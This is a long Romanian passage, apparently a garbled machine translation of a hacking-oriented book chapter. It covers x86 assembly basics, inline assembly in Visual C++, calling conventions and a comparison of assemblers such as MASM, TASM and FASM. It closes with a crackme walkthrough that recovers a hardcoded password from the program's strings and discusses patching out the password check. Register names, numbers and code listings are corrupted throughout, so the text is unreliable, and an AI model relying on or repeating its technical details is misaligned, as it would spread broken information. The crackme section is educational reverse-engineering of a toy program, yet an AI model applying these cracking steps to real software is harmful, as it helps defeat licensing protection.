XXX GOTO, care pe S Mai multe exemple de utilizare a acestuia sunt demonstrate în lista : Listarea Principalele tipuri de tranziții condiționate ale SMR eah, Eugos JZ XXX SMR [ES], Edx JaeUuu;Comparați Eax și Eush;Dacă sunt egale, faceți o tranziție la xxx;Comparați *es și edx;Dacă rușinea *edx> = edx,atunci treceți la UUU Partea I O revizuire a programelor de hacker pentru a apela funcțiile pe asamblator este multmai dificilă decât pe C În primul rând, există cel puțin două tipuri de provocări (convenții de apel) -SI Pascal Înacordul cu argumentele, funcțiile sunt transmise de la dreapta la stânga, iar funcția care provoacă codul le curăță destivă În acordul Pascal, totul se întâmplă invers!Argumentele sunt transmise de la stânga la dreapta, iar funcția însine le curăță de stivă Majoritatea funcțiilor AR operează sistemul Windows care respectă acordul combinat STDCALL, încare argumentele sunt introduse în conformitate cu Acordul C și sunt curățate din stivă prin acordul Pascal Valoareareturnată de funcție este observată în registrul EAC, iar perechea de registru EDX: EAX este utilizată pentru atransmite valori pe de biți Desigur, aceste acorduri trebuie să respecte numai atunci când sunt numite funcțiileexterne (ARI, Biblioteci etc ) Funcțiile „interne” nu sunt obligate să le urmeze și pot transmite argumente în orice modimaginabil, de exemplu, prin registre Listarea arată cel mai simplu exemplu de apel funcțional Lister Apelareafuncțiilor arcului sistemului de operare Push OTFSET Libname; // Trimitem apelul LoadLibrary,-// Apelarea funcției MOVH, EAX; // EAH conține un asamblator de excepție ca un stand de testare, cât de dificil este să Program pe un asamblatorcurat!Programul minim de lucru conține multe modele diferite, într -un mod complex, interacționând între ele șideschizând focul fără avertisment Într -o singură dată, ne -am tăiat din mediul obișnuit Folierea a două numere peasamblare nu este o problemă, ci pentru a aduce rezultatul acestei operații pe ecran Inserții de asamblare este oaltă problemă Spre deosebire de manualele de asamblare clasică (Zubkov, Yurov), care literalmente din primele liniiaruncă cititorul în prăpastia programării sistemice, intimidându -l cu complexitatea terifiantă a arhitecturiiprocesorului și a sistemului de operare, inserțiile de asamblare lasă cititorul cititorului în împrejurimile obișnuiteale limbilor de nivel înalt (de la și/sau Pascal) La Utilizarea lor de cunoștință cu lumea interioară a procesorului are loc treptat, fără să sară ascuțiți În plus,inserțiile de asamblare vă permit să începeți să studiați asamblatorul direct cu un regim de procesor protejat pe debiți Cert este că, în forma sa pură, regimul protejat este extrem de complicat pentru dezvoltare și, prin urmare,aproape toate orientările încep prezentarea cu descrierea unui regim real de biți învechit din punct de vedere moral,care nu numai că se dovedește a fi inutil, dar De asemenea, un mijloc minunat de a -l confunda pe student (amintiți -vă,"Uitați -l Tot ceea ce ați fost învățat înainte ") Metodologia de predare bazată pe inserții de asamblare depășeștetoate celelalte în cel puțin două categorii: □ Speed-literal după trei-patru zile de clase intensive, o persoană care nua cunoscut niciodată asamblatorul înainte, începe să o programeze destul de tolerabil □ ușurința de dezvoltare - Studiulasamblatorului apare aproape fără tensiune și efort În oricare dintre etapele instruirii, studentul nu este copleșit deo mulțime de informații insuportabile și impenetrabile, iar fiecare pas ulterior este intuitiv Deci, ce așteptăm?Pentrua declara inserții de asamblare în Microsoft Visual C ++ este cuvântul cheie asm Un exemplu de cel mai simplu programfolosind o inserție de asamblare este prezentat în lista Capitolul Asamblatori I Listarea Asamblatorinsert pentru a adăuga două numere main () {int a = ;int b = ;int s;// Declarăm variabila A și punem valoarea //punem variabila A și punem valoarea // punem variabila c acolo, dar nu o inițializăm // începutul inserției deasamblare ASM {mov Eah, a;Încărcăm valoarea variabilă A în registrul EAC MOV EBX, B;Încărcăm variabila B la EV -urile deînregistrare adaugă eah, ebx;Adăugăm EAX cu EAS, înregistrând rezultatul în EAX MOV, EAH;Încărcăm valoarea EAX învariabilă cu} // sfârșitul inserției de asamblare // // afișați conținutul C pe ecran folosind funcția familiară printfprintf ("a + b = %x + %x = % x \ n ", a, b , cu);Instrumentele necesare pentru a programa folosind inserții deasamblare, veți avea nevoie de un compilator cu un dezvoltator integrat (de exemplu, Microsoft Visual Studio) Inserțiilede asamblare sunt depanate în același mod ca un cod scris într -un limbaj cu nivel înalt, care este foarteconvenabil Programele scrise direct în limbajul asamblatorului sunt difuzate în codul mașinii folosind un traducător deasamblator Mai multe informații despre traducătorii de asamblare disponibile vor fi oferite în următoarea secțiune aacestui capitol, „Comparația traducătorilor de asamblare” Un program de asamblare re -jignit trebuie tratat cu uncomter Pentru setarea programelor de asamblare, puteți utiliza un compresor standard care face parte din MicrosoftVisual Studio sau produsul Microsoft Platform SDK Printre componentele non -standard, cel mai bun este ULINK, dezvoltatde Yuri Haron Acesta acceptă majoritatea formatelor de fișiere și oferă multe opțiuni inaccesibile în alte componente Îlputeți descărca la ftp://ftp styx cabel net/pub/unilink/ În scopuri non -profit, Ulink este gratuit În cele din urmă,veți avea nevoie de un debugger și dizassembler - pentru a căuta erori în propriile programe și pentru a hackingaplicațiile altor persoane În ceea ce privește debuggerii, aveți o selecție largă: Microsoft Visual Debugger, integratăîn Microsoft Visual Studio, Microsoft Windows Debugger (WDB);Kemel Debugger, furnizat ca parte a SDK șiDDK;Softice;Ollydbg, etc De la DizAssemblers, IDA Pro ar trebui să fie preferat ca lider incontestabil În plus, esterecomandat să adăugați alți agenți de hacker la Arsenal, o scurtă recenzie a cărei a fost prezentată în capitolul ,„Hacker Toolkit” Comparație a traducătorilor de asamblare Problema alegerii unui „doar corect” de traducător deasamblator chinuri nu numai începători, ci și programatori profesioniști Fiecare produs are propria sa cohortă de fani,iar disputa cu privire la avantajele și dezavantajele riscă să se transforme în „războaie sacre” Pe forumuri, astfel dediscuții sunt mai bine să nu se reproducă Cele mai populare asamblatoare (MASM, TASM, FASM, NASM, YASM) vor fi luate înconsiderare pe scurt în această secțiune, conform unei game largi de criterii, semnificația căreia toată lumea ar trebuisă se evalueze Partea I Revizuirea programelor de hacker cu limbi de nivel ridicat (C, Pascal) într -o anumită măsurăsunt compatibile între ele Deși textul sursă, conceput pentru un compilator, nu este întotdeauna transmis fărămodificări asupra celuilalt, sintaxa și alte concepte de limbaj rămân neschimbate Din această cauză, programatorii pot„minți” între Microsoft Visual C ++, Intel C ++, GCC, Open WATCOM ”, comparând plinătatea de sprijin Standard, viteza de difuzare, calitatea codogenei, popularitatea compilatorului, numărul de biblioteci și componentesuplimentare pentru acesta cu traducători de asamblator este diferită S -ar părea că asamblatorul arhitecturii șitraducătorilor standard x ar trebui să mențină standard, cu toate acestea, în realitate, acesta nu este un GAK în plusfață de sprijinul mnemonicelor echipelor de mașini, fiecare traducător are propriul său set de directive și macro-explicită, adesea incompatibil Listarea de asamblare, scrisă pentru difuzarea utilizării MASM, este inutilă pentru atransfera la FASM, deoarece posibilitățile furnizate de macro -expoziții sunt foarte diferite în ele Înfiptând o zicalăbine cunoscută, putem spune că atunci când alegeți un traducător de asamblator, alegeți o soartă pe care nu o veți puteaschimba, ceea ce nu veți putea schimba bine!Va trebui să ne retragem, să stăpânim de fapt o limbă nouă, dar aceasta esteîncă o jumătate de ticăloasă!Fiecare programator auto -respect de -a lungul timpului este depășit cu o grămadă debiblioteci de calibru diferite care efectuează toată munca murdară Unde le pun când se mută la un nou asamblator?!Nueste mai ușor de transferat decât să rescrieți de la zero!Din fericire, asamblatorul este doar un instrument, nu oreligie și nimeni nu a interzis încă utilizarea comună a mai multor traducători În practică, de obicei fac acest lucru Osarcină specifică este setată, iar cel mai adecvat instrument este selectat pentru a -l rezolva Desigur, pentru a facealegerea corectă, trebuie să știți ce asamblatori există în general și cum diferă unul de celălalt Criteriilefundamentale sunt un sortiment bogat este un semn sigur al absenței unui produs care se potrivește, dacă nu toate, celpuțin cel puțin Prin urmare, dacă există un anumit produs și nu există doar, ci colectează și un număr mare deutilizatori sub aripa sa, atunci cineva are nevoie cu adevărat de acest produs Comparând asamblatorii unul cu celălalt,este imposibil să găsești „cel mai bun” traducător (cum ar fi pur și simplu nu există) în această secțiune a colectatpur și simplu toate informațiile despre posibilitățile oferite, deoarece semnificația oricărui criteriu este întotdeaunasubiectivă prin definiție O persoană care ignoră cu încăpățânare existența Linux/BSD este absolut indiferentă la numărulde platforme la care a fost transferat acest sau acel traducător Și pentru cineva, aceasta este o problemă de importanțăprimordială!Cu toate acestea, există o serie de criterii fundamentale care sunt esențiale pentru toate categoriile deprogramatori Să începem cu generarea de informații de depanare, fără de care depanarea programului este mai complicatădecât „salut, lume”, se transformă în tortură reală Aici unii încearcă deja să obiecteze că asamblatorii, spre deosebirede limbile cu nivel înalt, nu sunt necesare, deoarece mnemonicele echipelor de mașini, în plita, că în debugger - lafel Și etichete?!Și structurile?!Și numele funcțiilor?!Scoate -le - iar codul va deveni complet incapabil săcitească!Puteți, desigur, să utilizați imprimarea de depanare: trebuie doar să introduceți programele Macros care suntinteresate de ecran sau în valorile/variabilele fișierului A fost odată, când nu existau debuggerii interactivi, a fostsigiliul de depanare și a fost principalul mijloc de combatere a erorilor De asemenea, puteți depana un program,deținând o imprimare a textelor originale în fața dvs , dar aceasta este deja o perversiune Open WATCOM - un proiectpentru a crea compilatoare open source bazate pe compilatorul comercial WATCOM Pagina principală a proiectului estehttp: /amvww openwatcom org/index php/main page Capitolul Asamblatori Problema este că formatulinformațiilor de depanare nu este standardizat, iar diverși traducători folosesc diverse formate Acest lucru nelimitează în alegerea debuggerilor sau ne obligă să folosim convertoare ale producătorilor din al treilea parte Maimult, merită menționat faptul că unii adunători (de exemplu, FASM) nu generează informații despre datorie în general Eibine, dacă doar cel mai simplu fișier de hartă, eh dar dacă formatul informațiilor de depanare este „curtea”traducătorului, atunci formatul fișierelor de ieșire este „fața” acesteia Cei neinițiați își vor ține doar umerii Careeste formatul?Un fișier obișnuit de obj, din care, cu ajutorul unui compoter, puteți face orice doriți de la ehe ladll De fapt, nu există fișiere de obiect „obișnuite” în natură Există fișiere de format OMF (în birourile editoriale dela Microsoft și IBM), Coff , ELF , A Out și multe alte formate exotice din AS , RDF , IEE , etc De asemenea,posibilitatea generației de „prin” fișiere duble care nu necesită Asistență din partea componentului Și uniiasamblatori (de exemplu, FASM) permit chiar „manual” să genereze fișiere executabile și biblioteci dinamice alediferitelor formate, controlând pe deplin procesul de creare și completarea câmpurilor cheie la discreția lor Cu toateacestea, programele scrise în întregime Pe asamblator, acestea sunt fie viruși, fie programe demonstrative, fie programe De regulă, numai componentele saumodulele dependente de sistem sunt scrise pe asamblare, critice pentru viteză, care sunt apoi legate de proiectulprincipal Prin urmare, dacă asamblatorul generează doar OMF, iar compilatorul - sicriu, atunci apare problema asamblăriiformatelor „diferite -calibre” Un singur compus este capabil să facă acest lucru - Ulink de la Yuri Haron, care oferă șioportunitățile bogate de asamblare a fișierelor „manual” Prin urmare, alegerea unui anumit traducător de asamblator seaflă în întregime pe conștiința (și competența) programatorului, dar este încă mai bine ca atât asamblatorul, cât șicompilatorul să genereze fișiere obiect ale acelorași formate Un alt criteriu important este numărul de arhitecturi deprocesor susținute, care au mai mult de o duzină în linia x Desigur, comenzile lipsă pot fi implementate folosindmacro -uri sau programate direct în codul mașinii prin DB Directiva Cu toate acestea, dacă motivați așa, de ce aveținevoie de asamblatori atunci când există editori hexici?!O atenție deosebită ar trebui acordată platformelor AMD X - și Intel IA Fie că dorim acest lucru sau nu, dar arhitecturile pe de biți au șanse bune de a stoarce x , așa cătrebuie să învețe să le programeze, astfel încât sprijinul lor de la traducător ar trebui să fie oferit acum!Apropo,niciunul dintre traducători nu susține setul de echipe de procesoare x integral De exemplu, este imposibil să scriiJMP H: OOOOOOOOH ON MASM și trebuie să recurgeți la OMF - formatul modulului obiect (formatul modulului obiect) Coff - Formatul general al modulului obiect (format de fișier obiect comun) ELF - Format de execuție și aspect(executabil și format de legătură) A out - Formatul clasic al codului obiectului Unix (numele în sine înseamnă „Ieșirede asamblare”), ELF este înlocuit în prezent (modulele executabile nu au extensii, fișierele obiect au expansiune OO) Asamblator pe biți pentru Linux AS are propriul format non-standard al fișierului obiect Deși compozitorul pentruacest asamblator LD generează fișiere similare cu formatul A OT standard, formatul fișierului obiect folosit pentru ainteracționa între AS și LD , are un format diferit de A OT Fișierele cu extinderea RDF sunt fișiere obiect aleformatului RDOFF (format de fișier obiect dinamic relocabil) RDOFF este un format al unui fișier obiect dezvoltat pentrutraducătorul NASM Format IEEE (IEEE- ) este utilizat pe multe platforme (inclusiv Motorola , Motorola ns ,Hitachi, Zilog) și pentru programarea multiplă platformă partea /, o revizuire a programelor de hacker la diversetrucuri De exemplu, puteți realiza o comandă prin DB, dar este lipsită de neleară și incomodă O opțiune alternativă estede a aduce segmentul/deplasarea în sticlă, apoi de a efectua RETF, dar aceasta este prea voluminoasă și, în plus,abordarea este folosită pe care nu o avem Programarea pe un amestec de un cod de și de biți, cu o tranziție petermen scurt la un mod protejat și revenirea la realitate- aceasta este în general o melodie Mai degrabă veți muri peMasm decât veți programa acest lucru, dar majoritatea programatorilor de o asemenea cascadă pur și simplu nu au nevoie”, dar ceea ce majoritatea are nevoie cu adevărat este integrarea în comunitatea mondială Cercetătorii independenți-entuziaști sunt de obicei angajați în dezvoltarea propriilor sisteme de operare În curriculum, acest lucru este, fărăîndoială, foarte bun, dar programatorii comerciali trebuie de obicei să programeze pentru sistemele existente, deexemplu, aceleași ferestre Și dacă DDK include MASM și multe texte inițiale ale șoferilor, atunci încercarea de a leasambla sub un alt traducător este o pierdere de timp Din nou, dacă compileorul Microsoft Visual C ++ setează cheia /FA,atunci va oferi asamblator în stilul MASM DA Ryu va face același lucru, Borland C ++ va alege Tasm (bine, aș vrea!), ȘiGCC - GNU Asamblator (aka Gas) Aceasta este integrarea miercuri Un asamblator pur este rar folosit în sine și aproapeîntotdeauna va fi atașat de altceva Adică, dacă scrieți drivere pentru Windows pe Microsoft Visual C ++, este cel mairezonabil să optați pentru MASM, este mai bine să găsiți ceva pentru fanii Borland C ++ Linux/BSD Leads Gas (GNUAsambler), cel puțin datorită faptului că programele de asamblare pot fi difuzate folosind compilatorul GCC folosind unpreprocesor C și eliberând de la o durere de cap cu căutarea codului și bibliotecilor de pornire Cu toate acestea, gazulfolosește sintaxa AT & T , care este exact opusul sintaxei Intel, care aderă la masm, tasm, fasm,nasm/yasm Dezvoltatorii de viruși și doar mici programe de asamblare scrise din Love for Art sunt mult mai puținlimitate în alegerea lor Și pot folosi tot ceea ce le place, indiferent de gradul de „sprijin” Calitatea documentației joacă un rol foarteimportant Nu mai puțin important este cine deține proiectul Traducătorii create de pasionați de unici pot muri în oricemoment, deci nu este recomandat să se bazeze pe ei pe termen lung Asamblatorii comerciali ai companiilor mari arată multmai stabile și de nezdruncinat, dar nu există garanții că, într -un moment „minunat”, compania nu va înceta să -șisprijine produsul (amintiți -vă doar povestea cu TASM) Traducătorii deschisi susținuți de un grup independent de oamenisunt cei mai tenace A meritat echipa NASM pentru a-și suspenda puțin dezvoltarea, Yasm a apărut imediat-„împrumut”textele sursă și a adăugat tot ce este necesar (suport pentru x - , formatul informațiilor de depanare Codeviewetc ) Ultimul lucru pe care aș dori să mă concentrez este macro -executiv Programatorii au o dublă atitudine față deei Unii folosesc fructele progresului cu puterea și principalul, programarea pe un amestec de asamblator, bază șipreprocesor C (chiar și HLA: High Nivel Assembler Project este un asamblator cu nivel înalt), alții îi disprețuiesc,susținând puritatea codului de asamblator Așadar, descoperiți -vă aici, cine are dreptate și cine este de vină!Macroessimplifică programarea, permițând adesea imposibilul (de exemplu, criptarea codului programului în stadiul deasamblare!), Dar toleranța programului de la acest lucru se deteriorează brusc, iar trecerea la un alt traducător devinedificil de cuprinzător Dar, fie că este posibil, sprijinul macro -urilor nu obligă deloc aceste macro -uri! în cea mairecentă versiune de gaz Sprijinul SIN-IXIS al limbii limbajului de asamblator Intel (a se vedeahttp://sources redhat com/binutils/) gpava asamblatori Dupăversiunea MASM , dezvoltarea produsului a fost inhibată pentru o perioadă, dar apoi bunul simț a preluat, iar ceamai recentă versiune (la momentul scrierii acestor linii - ) acceptă Unicode, toată expansiunea/sseii/ sseiii(declarat de două directive / him), precum și arhitectura AMD x - Platforma Intel IA nu este acceptată, darMicrosoft furnizează Intel Assembler as exe MASM de prescurtare este deloc ca Microsoft Assembler, dar ca asamblatormacro, adică asamblator cu suport pentru macro Macro -urile acoperă o gamă largă de sarcini cu capacitățile lor:repetarea aceluiași tip de operații de parametrizare (șabloane), macro -uri ciclice, asamblare condiționată, etc Existăchiar și sprijinul rudimentar al paradigmei principale a OOP a primit o distribuție deosebită, deoarece asamblatorul șiOOP sunt conceptual inconsecvente Mulți programatori scriu deloc fără macro -uri pe un asamblator pur, considerând calealor ca fiind cea mai corectă ideologic Dar nu se ceartă despre gusturi La început, MASM s -a răspândit sub forma unuipachet independent (și, în plus, foarte scump), dar mai târziu a fost inclus în produsul DDK, care a fost auzit gratuit,iar acum erau disponibili doar abonații MSDN Cu toate acestea, DDK complet complet (cu asamblator) pentru Windows Server face parte din cadrul driverului în modul kernel, iar traducătorul MASM în sine este, de asemenea, în produsulVisual Studio Express, care se răspândește și gratuit Steve Hutchensen a colectat cele mai recente versiuni aletraducătorului MASM, Microsoft Composer, a inclus fișiere, biblioteci, documentație extinsă, articole ale diverșilorautori dedicați asamblatorului și chiar un simplu mediu de dezvoltare integrat (IDE) într -o singură distribuție,cunoscut sub numele de „pachetul hatchian „(Pachetul lui Hutch), distribuit gratuit tuturor, în mod completautorizat Așadar, acesta nu este un hack, ci un set destul de convenabil de instrumente pentru programarea pentruWindows pe asamblator (Fig ) Multe cărți sunt dedicate traducătorului MASM, care simplifică procesul de învățare,iar în rețea puteți găsi multe texte inițiale ale programelor și bibliotecilor de asamblare care elibereazăprogramatorul din nevoia de a inventa o bicicletă În plus, MASM este limbajul de ieșire pentru mulți DizAssemblers(Sourcer, IDA Pro) Toate acestea fac din MASM un număr de traducător în programarea pentru platforma Wintel Douăformate de ieșire sunt acceptate: Microsoft OMF Microsoft și / de biți pe / biți Acest lucru vă permite sădifuzați următoarele tipuri de programe: P / biți pentru MS-DOS, funcționând în mod real și securizat, aplicații pe biți și drivere pentru Windows Z G, □ pe de biți și drivere pentru Windows pentru Windows A/ NT, □ Aplicații șidrivere pe de biți pentru ediția Windows NT pe de biți Pentru a crea fișiere binare, veți avea nevoie de un compus care să poată face acest lucru (de exemplu, Ulink de la YuriHaron) Apropo, cele mai recente versiuni ale compartimentului Microsoft standard, care face parte din SDK și DDK, aupierdut capacitatea de a asambla fișiere pe biți pentru MS-DOS/Windows Z L Prin urmare, dacă aveți o astfel denevoie, va trebui să vă întoarceți la versiunea veche care se află în folderul NTDDK \ Win ME \ bin! MASM genereazăinformații de depanare în formatul CodeView, pe care Microsoft Linker îl poate converti în formatul bazei de date aprogramului (PDB) Deși acest format nu este documentat, acesta este acceptat de biblioteca libghelp dll Acest lucrupermite dezvoltatorilor din al treilea particule să interpreteze informațiile de depanare, astfel încât fișierele caresunt sfâșiate folosind MASM pot fi depanate în softice, dezasamblați în IDA Pro și alte produse de acest tip Wintel =Windows + Intel Partea I Revizuirea programelor de hacker Fig Instalarea pungii Hatch este principaluldezavantaj al MASM este un număr mare de erori Unul nu trebuie decât să deschidă baza de cunoștințe, să se uite la listade erori confirmate oficial și îngroziți!De îndată ce puteți programa MASM după aceea?!Mai ales multe greșeli înbiblioteca standard Iată doar câteva exemple: funcțiile DWTOA și ATODW EX nu recunosc semnul și sunt foarte încetiniteîn viteză, deși documentația spune: „Și șirul zecimal ASCII de mare viteză pentru conversia DWORD pentru aplicațiiSpreming de mare viteză Ofreed a fost de mare parte Datele stementarion ” P Funcția UCFind nu găsește o abordare înlinie dacă lungimea reglării este simbol Funcția BMHBinSearch și SBMBinSearch, care a căutat algoritmul Boyer -mura(Vouig - Moore Search Algorithm), sunt implementate cu erori P Unele funcții reduc programul (de exemplu, dacătransferați funcțiile USTR DW cu o linie mai lungă de cinci octeți - programul scade) Un alt dezavantaj este lipsa desprijin pentru unele instrucțiuni și moduri de adresare a procesorului Așadar, de exemplu, este imposibil să seefectueze JMP Far Seg: Offset, iar o încercare de a crea un cod mixt de / biți este un coșmar real care trebuie să-și creeze mâinile, depășind rezistența „mentalității” a traducătorului În cele din urmă, MASM este un produs tipic cutexte cu sursă închisă, a căror soartă este acoperită cu întuneric Microsoft promovează intens programare la nivelridicat, abandonând asamblatorul peste tot, unde este posibil, este posibil, prin urmare, ca în câțiva ani MASM săînceteze să existe viteză mare a liniei zecimale ASCII în DWORD pentru aplicații care au nevoie de mare -ridicat- flux de viteză de date transformate Capitolul Asamblatori Cu toate acestea, în ciuda tuturor acestor deficiențe,MASM rămâne cel mai popular difuzant profesionist difuzat la programarea sub linia Windows NT Deși dezvoltatorii trebuiesă înjure teribil, el nu are alternative reale Tasm Cel mai popular asamblator al asamblatorului de la MS-DOS, creat deBorland, complet compatibil cu MASM până la versiunea x și acceptă propriul mod ideal cu un număr mare de îmbunătățiriși extensii Comoditatea programării, a cerințelor modeste ale sistemului și a vitezei mari de difuzare a furnizatconducerea TASM pe parcursul existenței MS-DOS Dar odată cu apariția ferestrelor, popularitatea Tasm a început să setopească literalmente în fața ochilor noștri Imposibil (sau nu dorește) să obțină compatibilitatea cu fișierele antet șibibliotecile incluse în kitul SDK/DDK, Borland a decis să furnizeze propria versiune portată, care este departe deideal În plus, compusul standard TLink/TLink nu acceptă posibilitatea creării de drivere, dar formatul fișierelor deieșire (Microsoft OMF, IBM OMF, Pharlap) nu este acceptat de versiunile curente ale compozitorului Microsoft (cu toateacestea, versiuni pe biți pe biți căci acest lucru sunt capabile de acest lucru) Pentru a -l încheia, formatulinformațiilor de depanare nu este compatibil cu CodeView și doar Turbo Debugger și Softice sunt cu adevăratacceptate Aceste probleme sunt rezolvate fundamental, deoarece a fost păstrată posibilitatea unei programări deasamblare cu nivel scăzut (fără fișiere și macro -uri incluse), iar incompatibilitatea formatelor este compensată deprezența convertoarelor Cu toate acestea, avantajele modului ideal față de sintaxele standard MASM păreau mai puțin saumai puțin semnificative zi de zi, iar rândurile fanilor proiectului au fost subțiri, iar în final a fost completînchis Cea mai recentă versiune a traducătorului TASM a fost versiunea , care acceptă comenzile procesorului Intelpână la Un patch a fost lansat separat, actualizând TASM la versiunea și ridicându -l până la Pentium MMX, cutoate acestea, comenzile Pentium II (de exemplu, Sysenter ) amândoi nu au funcționat și nu au funcționat Nufuncționează Suportul Unicode este, de asemenea, absent În prezent, Borland a încetat să -și răspândească asamblatorulși Îl puteți obține doar în magazinele care vând CD-ROM vechi sau la un colector O persoană cunoscută sub porecla! Te alansat un pachet TASM +, inclusiv un traducător, compus, biblioteci, o mică documentație, mai multe fișiere antetpentru Windows, precum și câteva exemple demonstrative Când căutați acest pachet, nu îl confundați cu TASM alcompaniei Squak Valley Software-acesta este un asamblator încrucișat complet independent, axat pe procesoare / / ns , , TMS , TMS C , TMS , , , / ,, / , / , / Z , / C ks, existența cărora majoritatea dintre noi suntem pur și simplu conștienți în cel mai bun caz Îngeneral, putem spune că Tasm este un ansamblu mort Cu toate acestea, pentru a dezvolta aplicații sub Windows / șiMS-DOS, este încă potrivit Acest lucru este valabil mai ales dacă aveți deja experiență de lucru cu el și unele dintrepropriile dezvoltări (biblioteci, macros), cu care vă pare rău să faceți parte, iar convertirea sub MASM este foarteproblematică Poate că îți va plăcea asamblatorul leneș Free (autor - Lady's Stepan), compatibil cu modul Tasm ideal șicomenzile de susținere de la MMX, SSE, SSEII, SSEIN, DNOW! PRO Fasm scrie despre proiecte religioase fără a afectasentimentele credincioșilor și, în timp ce păstrează partea sănătoasă a scepticismului și a obiectivismului nu este atâtde simplă, mai ales dacă ești fanul său FASM este un traducător extrem de neobișnuit, cu capacități exotice, pecare toți îi avem pentru o lungă perioadă de timp (și fără succes!) De la producători mari, care erau prea departe de tasm = asamblator turbo FASM - Asamblatorul regimului plat (Fiat Assembler) Partea I O revizuire a programelor dehacker din programarea practică și a încercat să formeze noi nevoi (de exemplu, prin introducerea suportului OOP), înloc să le satisfacă pe cele care sunt Acest lucru a continuat până când Tomasz Giysztar-un student absolvent laUniversitatea din Jagello din Cracovia-Did nu se gândește să-și scrie propriul sistem de operare, numit titan și săreprezinte o anumită aspect al unui sistem DOS pentru un regim sigur După ce a sortat mai mulți traducători deasamblare, dar fără a găsi unul potrivit printre ei, Tomash a mers la un pas destul de ambițios, hotărând să dezvolteinstrumentele necesare pe cont propriu Acest lucru s-a întâmplat în - - , : : (data creării primului fișier),iar până la începutul lunii mai , a apărut o versiune care s-ar putea difuza (Fasm a fost scris pe FASM) Sistemul deoperare, ca urmare a unui dezastru aleatoriu, a scăzut din moartea lui Brave, dar textele inițiale ale FASM au rămas,iar de atunci continuă să se dezvolte activ Ce este Fasm?Acesta este un asamblator cu o sintaxă extrem de simplificată(fără listare aglomerată a tipului de compensare), suportul complet al tuturor comenzilor procesorului (inclusiv JMP : ), un procesor macro -calificare înalt Fișiere de ieșire FASM este distribuit în textele originale în modgratuit Până în prezent, este transferat la MS-DOS, Windows X/NT, Linux, BSD Fasm acceptă Unicode și toate procesoareleliniei X până la Pentium cu seturi de instrucțiuni multimedia MMX, SSE, SSEII, SSEII, AMD DNOW!, Precum și platformaAMD X - Acest lucru vă permite să generați nu numai Microsoft Coff, ci și fișiere gata pregătite de formate BIN,MZ , RE și ELF Adică, de fapt, FASM vă permite să faceți fără un component, însă, în același timp, secțiunilesecțiunilor din re-fișier și tabelul de import trebuie create „manual” folosind directive speciale de asamblare, egoPare foarte tentant, dar în practică este încă mult mai convenabil să generați fișierul de format de sicriu și fișierulfișierului de format completați -l cu module scrise în limbi cu nivel înalt FASM MACRO -Language este atât de îngropatîncât vă permite să scrieți programe pe dvs fără o singură linie de asamblare Un exemplu de astfel de program esteprezentat în lista Și lasă pe cineva să mormăie, ei bine, spun ei, o altă încercare de a coborî asamblatorul lanivelul de bază Nimic de genul asta!Macro -urile este un lucru voluntar Dacă doriți - folosiți -l, nu doriți -nu Listarea Un program, scris în întregime în limbajul interpretat al fișierului FASM 'Interp ASM' Repetați $încărcați un byd de la %-l dacă a> = 'a' & a Deplasarea de la începutul I I I -> TextLine I I I D : LCMAPSSTRINGW OOO D F: KERNEL DL C: Crackme a: introduceți paswd: d:my good password f: Parolă greșită c: parolă OK AF: Hello, Legal User c : ? AV OS @@ DE: Avistream withassign @@ e: Implementarea terminată a programului de filtrare se numește filtru c șieste localizată pe CD în catalog \ part \ ch \ src \ crackme C F Lea h GPAVA Încălziți Luați înconsiderare listarea primită Acordați atenție liniei my good password, situat la dh Nu ar fi ea o parolă?Cel maiadesea (dar nu neapărat) linia dorită este situată destul de aproape de text, oferind utilizatorului să introducă parola(Introduceți Passwd :) Mai jos ( Afh) vedem un alt „candidat” Hai Să verificăm dacă cel puțin unul dintre ele este potrivit (prospectul ) J Listarea Reacția de apărare la ° D aprimului candidat întâlnit în parole> crackme c fllea h exe Introduceți paswd: școala vocațională • Good password parolaok salut, răspunsul de apărare al utilizatorului legal indică elocvent predarea completă și necondiționată În ciudasimplității, această metodă nu este lipsită de deficiențe Cel mai important dintre ei este că un hacking de succes nueste garantat Dacă dezvoltatorul nu este complet naiv, atunci nu va exista o parolă deschisă într -o formă deschisă Ometodă de hacking mai fiabilă (dar, din păcate și mai mult timp) este programul programului cu analiza ulterioară aalgoritmului de protecție Aceasta este o lucrare laborioasă și dureroasă, care necesită nu numai cunoaștereaasamblatorului, ci și perseverența, precum și intuiția Cu toate acestea, ochii se tem, iar mâinile lor fac cunoștință cu Dizassembler O'Kay, am recunoscut parola Dar cât de obositor să -l introduceți de fiecare dată de latastatură înainte de a începe programul!Ar fi bine să -l hack, astfel încât să nu fie solicitată deloc parolă sau să fiepercepută o parolă introdusă drept cea potrivită Vorbește cu Hakk?!Ei bine, nu este dificil!Este mult mai problematic sădecideți - ce este exact să hack Instrumentele hackerilor sunt extrem de diverse-ceea ce nu există: dizassemblers, șidebuggeri și ar -, și shpions de mesaje și monitoare de apeluri de fișiere (porturi, registre) și despachetări defișiere executabile și încercați totul cu Totul cu totul pentru a -și da seama de aceste ferme!Cu toate acestea,spionii, monitoarele, despacherii sunt utilitățile „a doua -plan”, iar arma principală a cracker -ului este debuggerulși dizassembler Luați în considerare mai aproape Permiteți numele „Dizassembler” nu vă induce în eroare: Dizassemblereste potrivit pentru studierea nu numai a programelor care au fost scrise pe asamblator - cercul aplicației sale estefoarte larg, deși nu este nelimitat Unde curge această frontieră?În general, toate implementările limbajelor deprogramare sunt împărțite în compilatoare și interpreți Interpreții execută programul în forma în care a fost tastat caprogramator Cu alte cuvinte, interpreții „mestecă” textul sursă, în timp ce codul programului este disponibil pentrustudiu direct fără instrumente suplimentare Un exemplu este aplicațiile scrise în limbi precum Basic sau Perl După cumștiți, pe lângă pornirea lor, pe lângă textul inițial al programului, este necesar să existe și un interpret însine Acest lucru este incomod pentru utilizatori (pentru a executa un program de kb, trebuie să instaleze uninterpret de MB) și nici dezvoltatori (în mintea lor bună și memoria sobră pentru a distribui textele originale aleprogramului lor!) În plus, analiza sintactică durează mult timp și niciun interpret nu se poate lăuda cuperformanța Compilatorii se comportă diferit - la prima lansare, ei „macină” programul în codul mașinii, executat directde procesor în sine, fără a contacta textele originale sau pentru compilatorul în sine Din punctul de vedere al uneipersoane obișnuite, programul compilat reprezintă un mishmash fără sens al numerelor hexadecimale, ceea ce este completimposibil de descoperit a -a parte a tehnicilor de hacking de bază II Acest lucru facilitează dezvoltareamecanismelor de protecție - fără a ști algoritmul, nu veți rupe apărarea oarbă, bine, poate va fi complet simplă Esteposibil să obțineți textul sursă al programului din codul mașinii?Nu!Compilarea este un proces controlat cu un singur Șiideea de aici nu este doar că mărcile și comentariile sunt eliminate pentru totdeauna (ne vom da seama fără comentarii -suntem hackeri sau nu?!) Blocul principal de poticnire este ambiguitatea corespondenței instrucțiunilor mașinii 